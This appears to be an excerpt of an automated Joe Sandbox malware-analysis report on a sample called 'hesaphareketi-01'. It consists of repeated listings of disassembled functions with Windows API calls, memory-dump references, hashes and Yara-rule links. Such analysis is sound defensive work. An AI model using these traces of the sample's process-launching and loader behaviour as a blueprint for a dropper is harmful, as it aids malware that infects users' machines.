                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404263 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(0001046E,00000000,00000000,00000000), ref: 00404275
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                                      • Instruction ID: 095d2356c3d82f38ec3eb680651803a72dc2fc2a091610a0eb944f64c2fac8e0
                                                                                      • Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                                      • Instruction Fuzzy Hash: 5CC09B717443007BDE118F609D85F0777546790741F14447D7344F51E0C774E450D61C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                      • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                                      • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                      • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004058AA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecuteShell
                                                                                      • String ID:
                                                                                      • API String ID: 587946157-0
                                                                                      • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                      • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                                      • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                      • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404239 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00404010), ref: 00404243
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                                      • Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
                                                                                      • Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                                      • Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                        • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                        • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,0040325E), ref: 00405341
                                                                                        • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll), ref: 00405353
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                        • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                                        • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                                        • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                                        • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                                        • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2972824698-0
                                                                                      • Opcode ID: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                                                      • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                                                      • Opcode Fuzzy Hash: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                                                      • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 8cef2f1a38d07bcfaadde647e6e80c0311f5f41b75afba5d4f2be5d43d8d1b67
                                                                                      • Instruction ID: 7b6d933f202abfdc9722895a59c2e384d2c5d1872e83ea8d1a096f69b0519c76
                                                                                      • Opcode Fuzzy Hash: 8cef2f1a38d07bcfaadde647e6e80c0311f5f41b75afba5d4f2be5d43d8d1b67
                                                                                      • Instruction Fuzzy Hash: D5D0A773F141008BD710EBB8BE8949E73F8E7803293208837E102F11D1E578C8428A1C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                      • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                      • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                      • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 00404873 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: DiskFreeSpace
                                                                                      • String ID: ,Dw
                                                                                      • API String ID: 1705453755-2489452552
                                                                                      • Opcode ID: dcd8d2c6bb54e9c8536819fe07ae25e492160a04e48682b5b23763b2fad7bbd6
                                                                                      • Instruction ID: 84f69d269bac0c3350f08650aea476d34f7b16ee9f2362fdb557c77b34ae8f06
                                                                                      • Opcode Fuzzy Hash: dcd8d2c6bb54e9c8536819fe07ae25e492160a04e48682b5b23763b2fad7bbd6
                                                                                      • Instruction Fuzzy Hash: 975192F1D00218EEDB11EFA5C941AEFB7B8EF84354F20457BE600B61D1D7389A418B69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p!C$p!C
                                                                                      • API String ID: 0-3125587631
                                                                                      • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                      • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                                                      • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                      • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406ADD Relevance: .3, Instructions: 334COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                                      • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                                                      • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                                      • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004043B4 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 204windowstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                                                      • GetSysColor.USER32(?), ref: 00404494
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                                                      • lstrlenW.KERNEL32(?), ref: 004044B5
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                                                      • SendMessageW.USER32(00000000), ref: 00404537
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
